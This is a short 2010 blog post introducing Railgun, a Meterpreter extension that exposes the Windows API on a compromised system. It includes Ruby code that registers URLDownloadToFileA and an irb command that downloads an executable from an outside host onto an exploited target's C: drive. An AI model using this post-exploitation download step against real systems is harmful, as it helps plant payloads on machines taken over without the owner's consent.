Wednesday, July 14, 2010

Railgun - WinAPI for Meterpreter

Courtesy-ugo.com

My first post on Metasploit framework! Most of us would be aware of the recent release of Railgun - a Meterpreter extension. Railgun was released by “Patrick HVE” and it's already won most of the hearts out there (if not atleast mine :)

What Railgun is? Railgun is an extension for Meterpreter Ruby. It allows us to use the complete Windows API on the Meterpreter controlled system. You may call any functions of any DLL you may find or uploaded to the target system.

I just quickly pulled out an additional API function that I added to the already compiled Railgun API list (which has some 1000 entries).

railgun.add_dll('urlmon','urlmon.dll')
railgun.add_function('urlmon','URLDownloadToFileA','DWORD',[
["DWORD","pcaller","in"],
["PCHAR","szURL","in"],
["PCHAR","szFileName","in"],
["DWORD","Reserved","in"],
["DWORD","lpfnCB","in"],
])

What we have done is added the urlmon.dll to the list and imported the function URLDownloadToFileA for our usage. When you have an exploited system and have gained access to the system through a Meterpreter session you can use the function URLDownloadToFileA to download any file from the internet on the target machine like this,

>>irb
>> client.core.use("railgun") => true
>>client.railgun.urlmon.URLDownloadToFileA(0,"http://www.example.com/metasploit.exe","C:\metasploit.exe",0,0) => {"GetLastError"=>0, "return"=>0}

which will download the file metasploit.exe from http://www.example.com to C:\ drive.

To summarize, Railgun is a powerful tool for executing WinAPI functions on the target machine. Greetings to the author for releasing a wonderful extension :)

-binaryhax0r

No comments:

Post a Comment